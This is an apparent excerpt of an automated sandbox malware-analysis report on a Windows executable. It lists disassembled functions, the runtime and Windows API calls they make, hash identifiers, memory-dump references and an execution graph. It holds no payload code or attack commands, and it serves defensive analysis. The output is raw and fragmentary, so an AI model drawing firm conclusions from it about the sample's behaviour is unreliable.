                                  • __EH_prolog3.LIBCMT ref: 0040D8E6
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040D8F0
                                  • int.LIBCPMTD ref: 0040D907
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • codecvt.LIBCPMT ref: 0040D92A
                                  • std::bad_alloc::bad_alloc.LIBCMTD ref: 0040D939
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D947
                                  • std::_Facet_Register.LIBCPMT ref: 0040D966
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040D96F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_alloc::bad_alloc
                                  • String ID:
                                  • API String ID: 3310255495-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _strcspn.LIBCMT ref: 004060F0
                                  • _strcspn.LIBCMT ref: 0040613D
                                  • ctype.LIBCPMTD ref: 00406197
                                  • std::ios_base::width.LIBCPMTD ref: 0040644F
                                    • Part of subcall function 00404CE0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00404CEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strcspn$Base::Concurrency::details::ContextIdentityQueueWorkctypestd::ios_base::width
                                  • String ID: @$LB
                                  • API String ID: 3152856973-1375617125
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004071B0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004071C1
                                    • Part of subcall function 004071B0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004071CE
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A7A3
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6A2
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6AE
                                    • Part of subcall function 0040A610: char_traits.LIBCPMTD ref: 0040A6BA
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6EA
                                    • Part of subcall function 0040A610: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A6F6
                                    • Part of subcall function 0040A610: char_traits.LIBCPMTD ref: 0040A6FF
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A825
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A831
                                  • char_traits.LIBCPMTD ref: 0040A83D
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0040A850
                                  • char_traits.LIBCPMTD ref: 0040A859
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                                  • String ID:
                                  • API String ID: 1941806930-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040303B
                                  • int.LIBCPMTD ref: 0040304D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040327B
                                  • int.LIBCPMTD ref: 0040328D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040331E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040333B
                                  • int.LIBCPMTD ref: 0040334D
                                    • Part of subcall function 00404D30: std::_Lockit::_Lockit.LIBCPMT ref: 00404D46
                                    • Part of subcall function 00404D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00404D70
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004033DB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,004142CE,00410E32), ref: 004142E5
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004142F3
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0041430C
                                  • SetLastError.KERNEL32(00000000,?,004142CE,00410E32), ref: 0041435E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __Getcvt.LIBCPMT ref: 0040CF5E
                                  • MultiByteToWideChar.KERNEL32(k)@,00000009,?,00000002,?,00000000), ref: 0040CFAC
                                  • MultiByteToWideChar.KERNEL32(k)@,00000009,00000001,00000001,?,00000000), ref: 0040D01E
                                  • MultiByteToWideChar.KERNEL32(k)@,00000009,00000001,00000001,?,00000000), ref: 0040D046
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$Getcvt
                                  • String ID: k)@
                                  • API String ID: 3195005509-2304320424
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D85DCB61,?,?,00000000,0042DCC1,000000FF,?,0041A1AE,?,?,0041A182,?), ref: 0041A249
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,0042DCC1,000000FF,?,0041A1AE,?,?,0041A182,?), ref: 0041A25B
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,0042DCC1,000000FF,?,0041A1AE,?,?,0041A182,?), ref: 0041A27D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prolog3_
                                  • String ID:
                                  • API String ID: 2427045233-3916222277
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004067A0: __Getcvt.LIBCPMT ref: 004067AF
                                  • _Maklocchr.LIBCPMTD ref: 0040704F
                                  • _Maklocchr.LIBCPMTD ref: 00407066
                                  Similarity
                                  • API ID: Maklocchr$Getcvt
                                  • String ID: pB
                                  • API String ID: 1068779903-3059159000
                                  • Opcode ID: 2ab8de39bbb2b37282b8e654738e84b15c8aff831b67239a12815e7fcf2c1cb0
                                  • Instruction ID: 355146b3e8986f8a6780d4a2e3957cce70afceab5ade8ca11c79d162e8a9a7ef
                                  • Opcode Fuzzy Hash: 2ab8de39bbb2b37282b8e654738e84b15c8aff831b67239a12815e7fcf2c1cb0
                                  • Instruction Fuzzy Hash: 3A417FB5E00209ABCB04DF91D851BAFB775AF84304F20812EE5056B3C1DB75AA42CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetConsoleOutputCP.KERNEL32 ref: 0041EE68
                                    • Part of subcall function 00424311: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00421F6C,?,00000000,-00000008), ref: 00424372
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0041F0BA
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0041F100
                                  • GetLastError.KERNEL32 ref: 0041F1A3
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: f4d446c7503e1caa4bc12088dfa2aa6da3dfbd4309480915beb3954a17425044
                                  • Instruction ID: 60cf06c8ceb0ea5622d3c444de1fe9ac85f18442b5a7983a7f22b62e23fd56b5
                                  • Opcode Fuzzy Hash: f4d446c7503e1caa4bc12088dfa2aa6da3dfbd4309480915beb3954a17425044
                                  • Instruction Fuzzy Hash: 3ED18D75D00288EFDF14CFA9D880AEDBBB4FF49314F28452AE816E7351D634A946CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Similarity
                                  • API ID: std::ios_base::good$char_traits
                                  • String ID:
                                  • API String ID: 1812610724-0
                                  • Opcode ID: eeb8f94b9ed67efd90668f5281338567e17da3a2cc540025e6dc43144ba327f4
                                  • Instruction ID: 9152e7101a80daff8bfac9f51ad5fc1f3c72c29d40b5916afd4a3ffe7faa4ee7
                                  • Opcode Fuzzy Hash: eeb8f94b9ed67efd90668f5281338567e17da3a2cc540025e6dc43144ba327f4
                                  • Instruction Fuzzy Hash: FD514174E042099BCB04DB65C891A7FB776EF85304F14812ED9127B3D2DB3DA806DB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Similarity
                                  • API ID: char_traits
                                  • String ID:
                                  • API String ID: 1158913984-0
                                  • Opcode ID: a5343bf2346bdb53e67bd871a3801ee3ca0ad45806965aedfa5f842b9be2caf6
                                  • Instruction ID: a8902f6be5721ce8c6493102739b7e83ca2cc6847c7aa7f5647aebcc1ea0a5cb
                                  • Opcode Fuzzy Hash: a5343bf2346bdb53e67bd871a3801ee3ca0ad45806965aedfa5f842b9be2caf6
                                  • Instruction Fuzzy Hash: 433184B5D00208ABCB04EFA1D851AEE7775AF50348F04407FE9017B282EB3D9A95C7DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Similarity
                                  • API ID: fpos
                                  • String ID:
                                  • API String ID: 1083263101-0
                                  • Opcode ID: 35462dccf0758a2ee716e78d3c3bd8a0bb9d6883d135a31e14104f2abf990f43
                                  • Instruction ID: 329a20781235309f49dfdd178b828fc557bafb4d1009888ab75be2d596dfbd6a
                                  • Opcode Fuzzy Hash: 35462dccf0758a2ee716e78d3c3bd8a0bb9d6883d135a31e14104f2abf990f43
                                  • Instruction Fuzzy Hash: 5E31D875A10109EFCB04DF99D991DEEB7B5EF88300F5081AAE905A7291E734AF00CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00405398
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 004053C9
                                  • new.LIBCMT ref: 004053D2
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: 2b5eaf0dcdf67d288a6363ed27ef4a31213a6677d72f55555049c1e4a6f99ce9
                                  • Instruction ID: ed6f9a79429c89acc8542604aa524be87d10e3adc822abb8cc19a903b67f55c3
                                  • Opcode Fuzzy Hash: 2b5eaf0dcdf67d288a6363ed27ef4a31213a6677d72f55555049c1e4a6f99ce9
                                  • Instruction Fuzzy Hash: 34216F70D01508EBDF14DFA5C58079EB7B1EF44345F1085AAE8156B281D378AA90CF49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00411ACE
                                    • Part of subcall function 00412106: ___AdjustPointer.LIBCMT ref: 00412150
                                  • _UnwindNestedFrames.LIBCMT ref: 00411AE5
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00411AF7
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00411B1B
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: 290c27d956fc69be8811d5bde271c4c0a4e5c50b55fa3a1459f3ed676d75112c
                                  • Instruction ID: 0dae1eca49bf3e44668aecf27d4fec388fac26295aa8cdfbd0b11976d9886a99
                                  • Opcode Fuzzy Hash: 290c27d956fc69be8811d5bde271c4c0a4e5c50b55fa3a1459f3ed676d75112c
                                  • Instruction Fuzzy Hash: 3F01D732000109BBCF12AF56CC41EDB3FBAFF48754F15841AFA5865121D77AE8A1DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteConsoleW.KERNEL32 ref: 0042C780
                                  • GetLastError.KERNEL32(?,0042847E,00000000,00000001,?,?,?,0041F1F7,?,00000000,00000000,?,?,?,0041F7D1,00000000), ref: 0042C78C
                                    • Part of subcall function 0042C752: CloseHandle.KERNEL32(FFFFFFFE), ref: 0042C762
                                  • ___initconout.LIBCMT ref: 0042C79C
                                    • Part of subcall function 0042C714: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 0042C727
                                  • WriteConsoleW.KERNEL32 ref: 0042C7B1
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: b984403707ad243fa86e60d953929dc35c343f4df83341fb6bac7fbd876e38fa
                                  • Instruction ID: e7eb7c13d01b286deb2aa3facca690a0e7735a60948a661f092ff582ac54949b
                                  • Opcode Fuzzy Hash: b984403707ad243fa86e60d953929dc35c343f4df83341fb6bac7fbd876e38fa
                                  • Instruction Fuzzy Hash: 0BF01236200135BBCF221FD2EC44A9E3F26FB493E0B444425FA1895130C7318921DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ctype.LIBCPMTD ref: 0040755E
                                  • std::ios_base::width.LIBCPMTD ref: 004077E4
                                    • Part of subcall function 00404CE0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00404CEA
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWorkctypestd::ios_base::width
                                  • String ID: @
                                  • API String ID: 46849196-2766056989
                                  • Opcode ID: 0476d762f8e1408e5cb70a481e6eb6227674a0d484e298158af9c116490829e3
                                  • Instruction ID: 53ccb4a0ce088ce96476172d5abb8a6e5729ef52891f82e14a3172199b56a592
                                  • Opcode Fuzzy Hash: 0476d762f8e1408e5cb70a481e6eb6227674a0d484e298158af9c116490829e3
                                  • Instruction Fuzzy Hash: EBD138B5D04108AFCB04DF99C991EEE77B5AF88304F14816EF905A7291DB38AE41CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 00419ADD
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: d097e38db029b6f7b8f3f83937a4e4599330315c6ff27636a9713bea47fd4f16
                                  • Instruction ID: 21fe5a5527b016725bab4f6e656bc787fcae53af7891aa4435ab6e8fcb17bfd6
                                  • Opcode Fuzzy Hash: d097e38db029b6f7b8f3f83937a4e4599330315c6ff27636a9713bea47fd4f16
                                  • Instruction Fuzzy Hash: 37518B71B0910196CB11BF14FA113EB67B0EF80B52F654C6BE095413A8EB3D9DC59A4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004058B7
                                  • char_traits.LIBCPMTD ref: 004058C7
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                  • String ID: 4j@
                                  • API String ID: 1444011685-904746723
                                  • Opcode ID: 82387f88945d7fc4a208b6de69c27e0afa750967242fa1480a9dd887b6e8295d
                                  • Instruction ID: 46023dceab305a3eb23035ba61cdc51870224976be2fd264dcc29fd4d9b3516e
                                  • Opcode Fuzzy Hash: 82387f88945d7fc4a208b6de69c27e0afa750967242fa1480a9dd887b6e8295d
                                  • Instruction Fuzzy Hash: A0410F71D145099BCB04FF69C952AAFB7B5EF84315F20413EE506B72D1DA386D00CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00415722
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: D$D
                                  • API String ID: 4062629308-2831827411
                                  • Opcode ID: f424810cff8c00d17c5f5efda1cad0ea5d0d04c9426438ff04658dc35123a906
                                  • Instruction ID: 8bf0dc9f21e63ffe1c3a491cffe23ff22630031f7c2e2f17320c2df5dce1e844
                                  • Opcode Fuzzy Hash: f424810cff8c00d17c5f5efda1cad0ea5d0d04c9426438ff04658dc35123a906
                                  • Instruction Fuzzy Hash: 0931E5B1A00601CBDB149F689C416EE37609BC5328F24421BF429973D1D77CD8828BD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0041559B
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: D$D
                                  • API String ID: 4062629308-2831827411
                                  • Opcode ID: e83a423f03ac780c5fcfa94935c75a4d87f91eff9022599b95c25b231ccda2e8
                                  • Instruction ID: af507a5548210d163da6b3945c1a53315e90f2d32a076a82bd498c751c2e98c8
                                  • Opcode Fuzzy Hash: e83a423f03ac780c5fcfa94935c75a4d87f91eff9022599b95c25b231ccda2e8
                                  • Instruction Fuzzy Hash: 2E31D4B1E00A109BDB149FA998012EE77A29FC5334F24431FE425973D5D77C99828A9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00401825
                                    • Part of subcall function 00408DD0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00408DDA
                                  • DeleteFileW.KERNEL32(00000000,?,?,0040161C), ref: 00401845
                                  Strings
                                  • Failed to delete file: , xrefs: 0040187F
                                  Similarity
                                  • API ID: Concurrency::details::$Affinity::operator!=Base::ContextDeleteFileHardwareIdentityQueueWork
                                  • String ID: Failed to delete file:
                                  • API String ID: 3573704698-802139604
                                  • Opcode ID: feb77c48e4971e188bfb18358a924c05519349d9b34b932e87aeae2c37e92d24
                                  • Instruction ID: f0f5bbdc8a2f0b1badd532eae22d6cb083b84698526b75bf131117a7413fce91
                                  • Opcode Fuzzy Hash: feb77c48e4971e188bfb18358a924c05519349d9b34b932e87aeae2c37e92d24
                                  • Instruction Fuzzy Hash: CC210071910108ABCB04FB91D851DEEB779AE94304B50467EB502B71E1EF386A05CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004058B7
                                  • char_traits.LIBCPMTD ref: 004058C7
                                  Similarity
                                  • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                  • String ID: 4j@
                                  • API String ID: 1444011685-904746723
                                  • Opcode ID: f9284e6f84bfce3802ce3be7d534924ee2909510edccafd6454c1df85963241b
                                  • Instruction ID: 883a3b899775eae1976112d965841a78aa284a8c2867d14a93e0f1d9c6bfb98f
                                  • Opcode Fuzzy Hash: f9284e6f84bfce3802ce3be7d534924ee2909510edccafd6454c1df85963241b
                                  • Instruction Fuzzy Hash: F801ED71E041099BCB14FF95D952BAFB379EF84315F10813EA515B72D1CA396E00CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage: 1.7%
                                  Dynamic/Decrypted Code Coverage: 2.4%
                                  Signature Coverage: 6%
                                  Total number of Nodes: 552
                                  Total number of Limit Nodes: 68
                                  execution_graph 82113 41f0e0 82114 41f0eb 82113->82114 82116 41b930 82113->82116 82117 41b956 82116->82117 82124 409d30 82117->82124 82119 41b962 82120 41b983 82119->82120 82132 40c1b0 82119->82132 82120->82114 82122 41b975 82168 41a670 82122->82168 82125 409d3d 82124->82125 82171 409c80 82124->82171 82127 409d44 82125->82127 82183 409c20 82125->82183 82127->82119 82133 40c1d5 82132->82133 82597 40b1b0 82133->82597 82135 40c22c 82601 40ae30 82135->82601 82137 40c252 82167 40c4a3 82137->82167 82610 414390 82137->82610 82139 40c297 82139->82167 82613 408a60 82139->82613 82141 40c2db 82141->82167 82620 41a4c0 82141->82620 82145 40c331 82146 40c338 82145->82146 82632 419fd0 82145->82632 82147 41bd80 2 API calls 82146->82147 82150 40c345 82147->82150 82150->82122 82151 40c382 82152 41bd80 2 API calls 82151->82152 82153 40c389 82152->82153 82153->82122 82154 40c392 82155 40f490 3 API calls 82154->82155 82156 40c406 82155->82156 82156->82146 82157 40c411 82156->82157 82158 41bd80 2 API calls 82157->82158 82159 40c435 82158->82159 82637 41a020 82159->82637 82162 419fd0 2 API calls 82163 40c470 82162->82163 82163->82167 82642 419de0 82163->82642 82166 41a670 2 API calls 82166->82167 82167->82122 82169 41af20 LdrLoadDll 82168->82169 82170 41a68f ExitProcess 82169->82170 82170->82120 82172 409c93 82171->82172 82222 418b80 LdrLoadDll 82171->82222 82202 418a30 82172->82202 82175 409ca6 82175->82125 82176 409c9c 